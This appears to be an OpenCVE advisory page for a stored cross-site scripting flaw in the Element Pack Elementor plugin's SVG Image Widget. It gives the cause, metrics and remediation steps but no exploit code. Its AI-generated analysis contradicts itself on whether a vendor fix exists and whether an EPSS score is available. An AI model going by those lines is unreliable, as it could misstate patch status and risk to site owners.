Description
The Element Pack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the SVG Image Widget in versions up to and including 8.4.2. This is due to insufficient input sanitization and output escaping on SVG content fetched from remote URLs in the render_svg() function. The function fetches SVG content using wp_safe_remote_get() and then directly echoes it to the page without any sanitization, only applying a preg_replace() to add attributes to the SVG tag which does not remove malicious event handlers. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary JavaScript in SVG files that will execute whenever a user accesses a page containing the malicious widget.
Published: 2026-04-08
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting
Action: Immediate Patch
AI Analysis

Impact

The plugin’s SVG Image Widget fetches external SVG files and echoes their content directly. Because it only adds attributes and does not strip malicious event handlers, a Contributor‑level user can upload or reference a crafted SVG containing JavaScript. When any visitor views the page with the widget, the script runs in that visitor’s browser, giving the attacker the ability to steal session cookies, deface content, or execute further attacks within the site context.

Affected Systems

WordPress sites running bdthemes Element Pack – Widgets, Templates & Addons for Elementor version 8.4.2 or earlier are vulnerable. The issue exists in the SVG Image Widget module and affects all deployments that provide Contributor or higher role access.

Risk and Exploitability

The CVSS base score of 6.4 indicates moderate severity. No EPSS score is available and the vulnerability is not listed in CISA’s KEV catalog. Exploitation requires possession of Contributor or higher privileges to inject the malicious SVG, but the impact is achieved on any user who views the affected page, meaning it can affect all authenticated or anonymous visitors depending on the widget’s placement.

Generated by OpenCVE AI on April 8, 2026 at 10:39 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the Element Pack plugin to version 8.4.3 or later.
  • If an immediate upgrade is not possible, remove or disable the SVG Image Widget for all contributors.
  • Restrict Contributor users from adding widgets that handle external SVG files.
  • Verify that any externally loaded SVG content is sanitized before rendering.

Generated by OpenCVE AI on April 8, 2026 at 10:39 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 08 Apr 2026 19:45:00 +0000

Type Values Removed Values Added
First Time appeared Bdthemes
Bdthemes element Pack – Widgets, Templates & Addons For Elementor
Wordpress
Wordpress wordpress
Vendors & Products Bdthemes
Bdthemes element Pack – Widgets, Templates & Addons For Elementor
Wordpress
Wordpress wordpress

Wed, 08 Apr 2026 17:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Wed, 08 Apr 2026 08:15:00 +0000

Type Values Removed Values Added
Description The Element Pack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the SVG Image Widget in versions up to and including 8.4.2. This is due to insufficient input sanitization and output escaping on SVG content fetched from remote URLs in the render_svg() function. The function fetches SVG content using wp_safe_remote_get() and then directly echoes it to the page without any sanitization, only applying a preg_replace() to add attributes to the SVG tag which does not remove malicious event handlers. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary JavaScript in SVG files that will execute whenever a user accesses a page containing the malicious widget.
Title Element Pack Addons for Elementor <= 8.4.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via SVG Image Widget
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}

Subscriptions

Bdthemes Element Pack – Widgets, Templates & Addons For Elementor
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T16:34:12.756Z

Reserved: 2026-03-23T15:02:38.592Z

Link: CVE-2026-4655

cve-icon Vulnrichment

Updated: 2026-04-08T14:47:22.770Z

cve-icon NVD

Status : Deferred

Published: 2026-04-08T08:16:24.407

Modified: 2026-04-24T18:15:28.940

Link: CVE-2026-4655

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-08T19:43:29Z

Weaknesses